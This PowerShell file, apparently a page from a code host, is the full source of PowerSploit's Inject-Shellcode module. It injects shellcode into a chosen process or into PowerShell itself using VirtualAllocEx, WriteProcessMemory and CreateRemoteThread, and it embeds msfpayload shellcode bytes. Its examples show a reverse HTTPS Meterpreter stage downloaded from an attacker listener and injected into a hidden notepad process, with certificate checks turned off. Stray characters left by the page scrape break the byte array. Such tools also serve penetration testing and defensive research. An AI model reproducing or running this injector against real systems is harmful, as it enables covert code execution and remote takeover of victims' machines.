458 lines
24 KiB
PowerShell
458 lines
24 KiB
PowerShell
function Inject-Shellcode {
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<#
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.Synopsis
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PowerSploit Module - Inject-Shellcode
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Author: Matthew Graeber (@mattifestation)
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License: BSD 3-Clause
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.Description
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Inject-Shellcode injects shellcode into the process ID of your choosing or within PowerShell locally.
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Portions of this project was based upon syringe.c v1.2 written by Spencer McIntyre
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PowerShell expects shellcode to be in the form 0xXX,0xXX,0xXX. To generate your
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shellcode in this form, you can use this command from within Backtrack (Thanks, Matt and g0tm1lk):
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msfpayload windows/exec CMD="cmd /k calc" EXITFUNC=thread C | sed '1,6d;s/[";]//g;s/\\/,0/g' | tr -d '\n' | cut -c2-
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Make sure to specify 'thread' for your exit process. Also, don't bother encoding your shellcode.
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It's entirely unnecessary.
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.Parameter ProcessID
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Process ID of the process you want to inject shellcode into.
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.Parameter Remote
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Indicates that you want to inject into a remote process.
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.Parameter Local
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Indicates that you want to inject within PowerShell.
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.Parameter Meterpreter_Reverse_Http
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Establish a reverse meterpreter shell over HTTP. Note: This will only work in 32-bit PowerShell.
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.Parameter Meterpreter_Reverse_Https
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Establish a reverse meterpreter shell over HTTPS. Note: This will only work in 32-bit PowerShell.
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.Parameter Lhost
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Specifies the IP address of the attack machine waiting to receive the reverse shell
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.Parameter Lport
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Specifies the port of the attack machine waiting to receive the reverse shell
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.Example
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PS> Inject-Shellcode -Remote 4274
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Description
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-----------
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Inject shellcode into process ID 4274.
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.Example
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PS> Inject-Shellcode -Local
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Description
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-----------
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Inject shellcode into the running instance of PowerShell.
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.Example
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PS> Start-Process C:\Windows\SysWOW64\notepad.exe -WindowStyle Hidden
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PS> $Proc = Get-Process notepad
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PS> Inject-Shellcode -Remote -ProcessId $Proc.Id -Meterpreter_Reverse_Https -Lhost 192.168.30.129 -Lport 443 -Verbose
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VERBOSE: Requesting meterpreter payload from https://192.168.30.129:443/INITM
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VERBOSE: Injecting shellcode into PID: 4004
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VERBOSE: Injecting into a Wow64 process.
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VERBOSE: Using 32-bit shellcode.
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VERBOSE: Shellcode memory reserved at 0x03BE0000
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VERBOSE: Emitting 32-bit assembly call stub.
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VERBOSE: Thread call stub memory reserved at 0x001B0000
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VERBOSE: Shellcode injection complete!
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Description
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-----------
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Establishes a reverse https meterpreter payload from within the hidden notepad process. A multi-handler was set up
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with the following options:
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Payload options (windows/meterpreter/reverse_https):
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Name Current Setting Required Description
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---- --------------- -------- -----------
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EXITFUNC thread yes Exit technique: seh, thread, process, none
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LHOST 192.168.30.129 yes The local listener hostname
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LPORT 443 yes The local listener port
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.Example
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PS> Inject-Shellcode -Local -Meterpreter_Reverse_Http -Lhost 192.168.30.129 -Lport 80
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Description
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-----------
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Establishes a reverse http meterpreter payload from within the running PwerShell process. A multi-handler was set up
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with the following options:
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Payload options (windows/meterpreter/reverse_http):
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Name Current Setting Required Description
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---- --------------- -------- -----------
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EXITFUNC thread yes Exit technique: seh, thread, process, none
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LHOST 192.168.30.129 yes The local listener hostname
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LPORT 80 yes The local listener port
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.Notes
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Use the '-Verbose' option to print detailed information.
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Place your generated shellcode in $Shellcode32 and $Shellcode64 variables.
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.Link
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My blog: http://www.exploit-monday.com
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Big thanks to Oisin (x0n) Grehan (@oising) for answering all my obscure questions at the drop of a hat - http://www.nivot.org/
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#>
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[CmdletBinding(DefaultParameterSetName = '1')] Param (
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[Parameter(Position = 0)] [String] $ProcessID,
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[Parameter()] [Switch] $Remote = $false,
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[Parameter()] [Switch] $Local = $true,
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[Parameter(Mandatory = $True, ParameterSetName = '2')] [Switch] $Meterpreter_Reverse_Http,
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[Parameter(Mandatory = $True, ParameterSetName = '3')] [Switch] $Meterpreter_Reverse_Https,
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[Parameter(Mandatory = $True, ParameterSetName = '2')]
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[Parameter(Mandatory = $True, ParameterSetName = '3')] [Int] $Lport = 8443,
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[Parameter(Mandatory = $True, ParameterSetName = '2')]
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[Parameter(Mandatory = $True, ParameterSetName = '3')] [String] $Lhost = '127.0.0.1', # Defaults to localhost in case a mistake is made
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[Parameter(ParameterSetName = '2')]
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[Parameter(ParameterSetName = '3')] [String] $UserAgent = 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)'
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)
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if ($Remote -and !$ProcessID) {
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Write-Warning "You must specify a process ID!"
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return
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}
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try {
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Get-Process -Id $ProcessID -ErrorAction Stop | Out-Null
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} catch [System.Management.Automation.ActionPreferenceStopException] {
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Write-Warning "Process does not exist!"
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return
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}
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function Get-DelegateType
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{
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Param (
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[Parameter(Position = 0, Mandatory = $True)] [Type[]] $Parameters,
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[Parameter(Position = 1)] [Type] $ReturnType = [Void]
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)
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$Domain = [AppDomain]::CurrentDomain
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$DynAssembly = New-Object System.Reflection.AssemblyName('ReflectedDelegate')
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$AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run)
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$ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('InMemoryModule', $false)
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$TypeBuilder = $ModuleBuilder.DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
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$ConstructorBuilder = $TypeBuilder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $Parameters)
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$ConstructorBuilder.SetImplementationFlags('Runtime, Managed')
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$MethodBuilder = $TypeBuilder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $ReturnType, $Parameters)
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$MethodBuilder.SetImplementationFlags('Runtime, Managed')
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return $TypeBuilder.CreateType()
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}
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function Get-ProcAddress
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{
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Param (
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[Parameter(Position = 0, Mandatory = $True)] [String] $Module,
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[Parameter(Position = 1, Mandatory = $True)] [String] $Procedure
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)
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# Get a reference to System.dll in the GAC
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$SystemAssembly = [AppDomain]::CurrentDomain.GetAssemblies() |
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Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }
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$UnsafeNativeMethods = $SystemAssembly.GetType('Microsoft.Win32.UnsafeNativeMethods')
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# Get a reference to the GetModuleHandle and GetProcAddress methods
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$GetModuleHandle = $UnsafeNativeMethods.GetMethod('GetModuleHandle')
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$GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress')
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# Get a handle to the module specified
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$Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))
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$tmpPtr = New-Object IntPtr
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$HandleRef = New-Object System.Runtime.InteropServices.HandleRef($tmpPtr, $Kern32Handle)
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# Return the address of the function
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return $GetProcAddress.Invoke($null, @([System.Runtime.InteropServices.HandleRef]$HandleRef, $Procedure))
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}
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function Emit-CallThreadStub ([IntPtr] $BaseAddr, [IntPtr] $ExitThreadAddr, [Int] $Architecture) {
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$IntSizePtr = $Architecture / 8
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function ConvertTo-LittleEndian ([IntPtr] $Address) {
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$LittleEndianByteArray = New-Object Byte[](0)
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$Address.ToString("X$($IntSizePtr*2)") -split '([A-F0-9]{2})' | ForEach-Object { if ($_) { $LittleEndianByteArray += [Byte] ('0x{0}' -f $_) } }
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[System.Array]::Reverse($LittleEndianByteArray)
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return $LittleEndianByteArray
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}
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$CallStub = New-Object Byte[](0)
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if ($IntSizePtr -eq 8) {
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[Byte[]] $CallStub = 0x48,0xB8 # MOV QWORD RAX, &shellcode
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$CallStub += ConvertTo-LittleEndian $BaseAddr # &shellcode
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$CallStub += 0xFF,0xD0 # CALL RAX
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$CallStub += 0x6A,0x00 # PUSH BYTE 0
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$CallStub += 0x48,0xB8 # MOV QWORD RAX, &ExitThread
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$CallStub += ConvertTo-LittleEndian $ExitThreadAddr # &ExitThread
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$CallStub += 0xFF,0xD0 # CALL RAX
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} else {
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[Byte[]] $CallStub = 0xB8 # MOV DWORD EAX, &shellcode
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$CallStub += ConvertTo-LittleEndian $BaseAddr # &shellcode
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$CallStub += 0xFF,0xD0 # CALL EAX
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$CallStub += 0x6A,0x00 # PUSH BYTE 0
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$CallStub += 0xB8 # MOV DWORD EAX, &ExitThread
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$CallStub += ConvertTo-LittleEndian $ExitThreadAddr # &ExitThread
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$CallStub += 0xFF,0xD0 # CALL EAX
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}
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return $CallStub
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}
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function Inject-RemoteShellcode ([Int] $ProcessID)
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{
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# Open a handle to the process you want to inject into
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$hProcess = $OpenProcess.Invoke(0x001F0FFF, $false, $ProcessID) # ProcessAccessFlags.All (0x001F0FFF)
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if (!$hProcess) { Write-Warning 'Unable to open process handle.'; return }
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$IsWow64 = $false
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if ($64bitCPU) # Only perform theses checks if CPU is 64-bit
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{
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# Determine is the process specified is 32 or 64 bit
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$IsWow64Process.Invoke($hProcess, [Ref] $IsWow64) | Out-Null
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if ((!$IsWow64) -and $PowerShell32bit) {
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Write-Warning 'Unable to inject 64-bit shellcode from within 32-bit Powershell. Use the 64-bit version of Powershell if you want this to work.'; return
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} elseif ($IsWow64){
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if (!$Shellcode32) { Write-Warning 'No shellcode was placed in the $Shellcode32 variable!'; return }
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$Shellcode = $Shellcode32
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Write-Verbose 'Injecting into a Wow64 process.'
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Write-Verbose 'Using 32-bit shellcode.'
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} else {
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if (!$Shellcode64) { Write-Warning 'No shellcode was placed in the $Shellcode64 variable!'; return }
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Write-Verbose 'Using 64-bit shellcode.'
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$Shellcode = $Shellcode64
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}
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} else {
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if (!$Shellcode32) { Write-Warning 'No shellcode was placed in the $Shellcode32 variable!'; return }
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$Shellcode = $Shellcode32
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}
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# Reserve and commit enough memory in remote process to hold the shellcode
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$RemoteMemAddr = $VirtualAllocEx.Invoke($hProcess, [IntPtr]::Zero, $Shellcode.Length + 1, 0x3000, 0x40) # (Reserve|Commit, RWX)
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if (!$RemoteMemAddr) { Write-Warning 'Unable to allocate shellcode memory in remote process.'; return }
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Write-Verbose "Shellcode memory reserved at 0x$($RemoteMemAddr.ToString("X$([IntPtr]::Size*2)"))"
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# Copy shellcode into the previously allocated memory
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$WriteProcessMemory.Invoke($hProcess, $RemoteMemAddr, $Shellcode, $Shellcode.Length, [Ref] 0) | Out-Null
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# Get address of ExitThread function
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$ExitThreadAddr = Get-ProcAddress kernel32.dll ExitThread
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if ($IsWow64) {
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# Build 32-bit inline assembly stub to call the shellcode upon creation of a remote thread.
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$CallStub = Emit-CallThreadStub $RemoteMemAddr $ExitThreadAddr 32
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Write-Verbose 'Emitting 32-bit assembly call stub.'
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} else {
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# Build 64-bit inline assembly stub to call the shellcode upon creation of a remote thread.
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$CallStub = Emit-CallThreadStub $RemoteMemAddr $ExitThreadAddr 64
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Write-Verbose 'Emitting 64-bit assembly call stub.'
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}
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# Allocate inline assembly stub
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$RemoteStubAddr = $VirtualAllocEx.Invoke($hProcess, [IntPtr]::Zero, $CallStub.Length, 0x3000, 0x40) # (Reserve|Commit, RWX)
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if (!$RemoteMemAddr) { Write-Warning 'Unable to allocate thread call stub memory in remote process.'; return }
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Write-Verbose "Thread call stub memory reserved at 0x$($RemoteStubAddr.ToString("X$([IntPtr]::Size*2)"))"
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# Write 32-bit assembly stub to remote process memory space
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$WriteProcessMemory.Invoke($hProcess, $RemoteStubAddr, $CallStub, $CallStub.Length, [Ref] 0) | Out-Null
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# Execute shellcode as a remote thread
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$ThreadHandle = $CreateRemoteThread.Invoke($hProcess, [IntPtr]::Zero, 0, $RemoteStubAddr, $RemoteMemAddr, 0, [IntPtr]::Zero)
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if (!$ThreadHandle) { Write-Warning 'Unable to launch remote thread.'; return } # Error launching thread
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# Close process handle
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$CloseHandle.Invoke($hProcess) | Out-Null
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Write-Verbose 'Shellcode injection complete!'
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}
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function Inject-LocalShellcode
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{
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if ($PowerShell32bit) {
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if (!$Shellcode32) { Write-Warning 'No shellcode was placed in the $Shellcode32 variable!'; return }
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$Shellcode = $Shellcode32
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Write-Verbose 'Using 32-bit shellcode.'
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} else {
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if (!$Shellcode64) { Write-Warning 'No shellcode was placed in the $Shellcode64 variable!'; return }
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$Shellcode = $Shellcode64
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Write-Verbose 'Using 64-bit shellcode.'
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}
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# Allocate RWX memory for the shellcode
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$BaseAddress = $VirtualAlloc.Invoke([IntPtr]::Zero, $Shellcode.Length + 1, 0x3000, 0x40) # (Reserve|Commit, RWX)
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if (!$BaseAddress) { Write-Warning 'Unable to allocate shellcode memory.'; return }
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Write-Verbose "Shellcode memory reserved at 0x$($BaseAddress.ToString("X$([IntPtr]::Size*2)"))"
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# Copy shellcode to RWX buffer
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[System.Runtime.InteropServices.Marshal]::Copy($Shellcode, 0, $BaseAddress, $Shellcode.Length)
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# Get address of ExitThread function
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$ExitThreadAddr = Get-ProcAddress kernel32.dll ExitThread
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if ($PowerShell32bit) {
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$CallStub = Emit-CallThreadStub $BaseAddress $ExitThreadAddr 32
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Write-Verbose 'Emitting 32-bit shellcode.'
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} else {
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$CallStub = Emit-CallThreadStub $BaseAddress $ExitThreadAddr 64
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Write-Verbose 'Emitting 64-bit shellcode.'
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}
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# Allocate RWX memory for the thread call stub
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$CallStubAddress = $VirtualAlloc.Invoke([IntPtr]::Zero, $CallStub.Length + 1, 0x3000, 0x40) # (Reserve|Commit, RWX)
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if (!$BaseAddress) { Write-Warning 'Unable to allocate thread call stub memory.'; return }
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Write-Verbose "Thread call stub memory reserved at 0x$($CallStubAddress.ToString("X$([IntPtr]::Size*2)"))"
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# Copy call stub to RWX buffer
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[System.Runtime.InteropServices.Marshal]::Copy($CallStub, 0, $CallStubAddress, $CallStub.Length)
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# Launch shellcode in it's own thread
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$ThreadHandle = $CreateThread.Invoke([IntPtr]::Zero, 0, $CallStubAddress, $BaseAddress, 0, [IntPtr]::Zero)
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if (!$ThreadHandle) { Write-Warning 'Unable to launch thread.'; return } # Error launching thread
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# Wait for shellcode thread to terminate
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$WaitForSingleObject.Invoke($ThreadHandle, 0xFFFFFFFF) | Out-Null
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$VirtualFree.Invoke($CallStubAddress, $CallStub.Length + 1, 0x8000) | Out-Null # MEM_RELEASE (0x8000)
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$VirtualFree.Invoke($BaseAddress, $Shellcode.Length + 1, 0x8000) | Out-Null # MEM_RELEASE (0x8000)
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Write-Verbose 'Shellcode injection complete!'
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}
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$64bitCPU = $true
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$IsWow64ProcessAddr = Get-ProcAddress kernel32.dll IsWow64Process
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if ($IsWow64ProcessAddr) {
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$IsWow64ProcessDelegate = Get-DelegateType @([IntPtr], [Bool].MakeByRefType()) ([Bool])
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$IsWow64Process = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IsWow64ProcessAddr, $IsWow64ProcessDelegate)
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} else {
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$64bitCPU = $false
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}
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if ([IntPtr]::Size -eq 4) { $PowerShell32bit = $true } else { $PowerShell32bit = $false }
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if ($Meterpreter_Reverse_Http -or $Meterpreter_Reverse_Https) {
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if (!$PowerShell32bit) {
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Write-Warning 'The meterpreter reverse http payload is only compatible with 32-bit PowerShell'
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return
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}
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# Meterpreter expects 'INITM' in the URI in order to initiate stage 0. Awesome authentication, huh?
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if ($Meterpreter_Reverse_Https) { $SSL = 's'; [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true } }
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$Request = "http$($SSL)://$($Lhost):$($Lport)/INITM"
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Write-Verbose "Requesting meterpreter payload from $Request"
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$Uri = New-Object Uri($Request)
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$WebClient = New-Object System.Net.WebClient
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$WebClient.Headers.Add('user-agent', "$UserAgent")
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try {
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[Byte[]] $Shellcode32 = $WebClient.DownloadData($Uri)
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[Byte[]] $Shellcode64 = $Shellcode32
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} catch {
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Write-Warning "Unable to connect to $Request"
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return
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}
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} else {
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# Pop a calc... or whatever shellcode you decide to place in here
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# Insert your shellcode here in the for 0xXX,0xXX,...
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# 32-bit payload
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# msfpayload windows/exec CMD="cmd /k calc" EXITFUNC=thread
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[Byte[]] $Shellcode32 = @(0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,
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0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0,
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0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57,
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0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,
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0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b,
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0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,
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0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,
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0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,
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0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d,
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0x6a,0x01,0x8d,0x85,0xb9,0x00,0x00,0x00,0x50,0x68,0x31,0x8b,0x6f,0x87,0xff,0xd5,
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0xbb,0xe0,0x1d,0x2a,0x0a,0x68,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x3c,0x06,0x7c,0x0a,
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0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x00,0x53,0xff,0xd5,0x63,
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0x61,0x6c,0x63,0x00)
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# 64-bit payload
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# msfpayload windows/x64/exec CMD="calc" EXITFUNC=thread
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[Byte[]] $Shellcode64 = @(0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,
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0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,
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0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,
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0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,
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0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x8b,0x80,0x88,
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0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x50,0x8b,0x48,0x18,0x44,
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0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,
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0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,
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0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,
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0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,
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|
0x01,0xd0,0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,
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0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,
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|
0x59,0x5a,0x48,0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x48,0xba,0x01,0x00,0x00,
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|
0x00,0x00,0x00,0x00,0x00,0x48,0x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba,0x31,0x8b,
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|
0x6f,0x87,0xff,0xd5,0xbb,0xe0,0x1d,0x2a,0x0a,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,
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0xd5,0x48,0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,
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|
0x13,0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x63,0x61,0x6c,0x63,0x00)
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}
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if ($Remote) {
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$OpenProcessAddr = Get-ProcAddress kernel32.dll OpenProcess
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$OpenProcessDelegate = Get-DelegateType @([UInt32], [Bool], [UInt32]) ([IntPtr])
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$OpenProcess = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenProcessAddr, $OpenProcessDelegate)
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$VirtualAllocExAddr = Get-ProcAddress kernel32.dll VirtualAllocEx
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$VirtualAllocExDelegate = Get-DelegateType @([IntPtr], [IntPtr], [Uint32], [UInt32], [UInt32]) ([IntPtr])
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$VirtualAllocEx = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualAllocExAddr, $VirtualAllocExDelegate)
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$WriteProcessMemoryAddr = Get-ProcAddress kernel32.dll WriteProcessMemory
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$WriteProcessMemoryDelegate = Get-DelegateType @([IntPtr], [IntPtr], [Byte[]], [UInt32], [UInt32].MakeByRefType()) ([Bool])
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$WriteProcessMemory = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WriteProcessMemoryAddr, $WriteProcessMemoryDelegate)
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$CreateRemoteThreadAddr = Get-ProcAddress kernel32.dll CreateRemoteThread
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$CreateRemoteThreadDelegate = Get-DelegateType @([IntPtr], [IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr])
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$CreateRemoteThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CreateRemoteThreadAddr, $CreateRemoteThreadDelegate)
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$CloseHandleAddr = Get-ProcAddress kernel32.dll CloseHandle
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$CloseHandleDelegate = Get-DelegateType @([IntPtr]) ([Bool])
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$CloseHandle = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CloseHandleAddr, $CloseHandleDelegate)
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Write-Verbose "Injecting shellcode into PID: $ProcessId"
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Inject-RemoteShellcode $ProcessId
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} else {
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$VirtualAllocAddr = Get-ProcAddress kernel32.dll VirtualAlloc
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$VirtualAllocDelegate = Get-DelegateType @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])
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$VirtualAlloc = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualAllocAddr, $VirtualAllocDelegate)
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$VirtualFreeAddr = Get-ProcAddress kernel32.dll VirtualFree
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$VirtualFreeDelegate = Get-DelegateType @([IntPtr], [Uint32], [UInt32]) ([Bool])
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$VirtualFree = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualFreeAddr, $VirtualFreeDelegate)
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$CreateThreadAddr = Get-ProcAddress kernel32.dll CreateThread
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$CreateThreadDelegate = Get-DelegateType @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr])
|
|
$CreateThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CreateThreadAddr, $CreateThreadDelegate)
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$WaitForSingleObjectAddr = Get-ProcAddress kernel32.dll WaitForSingleObject
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$WaitForSingleObjectDelegate = Get-DelegateType @([IntPtr], [Int32]) ([Int])
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|
$WaitForSingleObject = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WaitForSingleObjectAddr, $WaitForSingleObjectDelegate)
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Write-Verbose "Injecting shellcode into PowerShell"
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|
Inject-LocalShellcode
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}
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}
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